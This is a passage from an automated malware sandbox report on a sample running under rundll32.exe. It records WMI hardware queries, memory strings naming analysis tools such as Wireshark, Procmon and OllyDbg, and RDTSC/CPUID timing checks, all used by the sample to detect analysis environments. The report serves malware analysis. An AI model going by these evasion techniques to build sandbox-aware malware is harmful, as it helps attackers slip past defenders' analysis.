    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

    Malware Analysis System Evasion

    Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORYSTR
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237918818.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXEACADEMY.COM
    Source: rundll32.exe, 0000000D.00000003.2561299847.0000025BF00DA000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488206053.0000025BF00D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: FILEMON.EXEEEEEP161.EXEE
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEE.EXEEE
    Source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXESSNAMEYTOOLSE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HREGMON.EXEP
    Source: rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXED
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXERONCLASSNAMEST
    Source: rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488206053.0000025BF00D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
    Source: rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXEXE
    Source: rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PROCMON.EXEVEL LEVEL="ASJ
    Source: rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461727840.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522294812.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE]
    Source: rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXEXE
    Source: rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935290329.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PROCMON.EXEMON.EXE.EXEEE
    Source: rundll32.exe, 0000000D.00000002.3521533171.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEX @|[
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXEEXEE.EXEEXE
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE`3
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
    Source: rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXERTSECURITYLS
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461727840.0000025BF016B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEK.EXE
    Source: rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE.
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXEECURITYTOOLS
    Source: rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEEXECXEEEXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
    Source: rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE@
    Source: rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE P
    Source: rundll32.exe, 0000000D.00000002.3521533171.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE@
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
    Source: rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEE
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEEEXENNER.EXEE
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXET.EXEALL.EXEE
    Source: rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEJ
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXES
    Source: rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237881300.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEOB&|
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEEFILE.EXEEXEE
    Source: rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEERNETSECURITY
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
    Source: rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXE
    Source: rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE#
    Source: rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXEEEXEEXEEK.EXE
    Source: rundll32.exe, 0000000D.00000003.2563006653.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562791270.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXECK.EXE
    Source: rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEXZ
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE_
    Source: rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461727840.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522294812.0000025BF016E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEXE
    Source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXETORE
    Source: rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEEPY.
    Source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXETOR
    Source: rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEEXECXEEEXE TZ
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBD6 second address: 7FFD944ABBE7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov dword ptr [esp+000000C8h], eax 0x0000000a mov eax, 00000001h 0x0000000f cpuid 0x00000011 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBE7 second address: 7FFD944ABBF1 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov dword ptr [esp+000000C0h], eax 0x0000000a rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBF1 second address: 7FFD944ABBFD instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ebx, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBFD second address: 7FFD944ABC02 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC02 second address: 7FFD944ABC13 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov dword ptr [esp+000000B8h], eax 0x0000000a mov eax, 00000001h 0x0000000f cpuid 0x00000011 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC13 second address: 7FFD944ABC18 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ebp, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC18 second address: 7FFD944ABC24 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov edx, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC24 second address: 7FFD944ABC29 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov ebx, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC29 second address: 7FFD944ABC35 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov ebp, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC35 second address: 7FFD944ABC3A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov esi, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC3A second address: 7FFD944ABC46 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ecx, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC46 second address: 7FFD944ABC4B instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov edi, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC4B second address: 7FFD944ABC57 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov esi, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
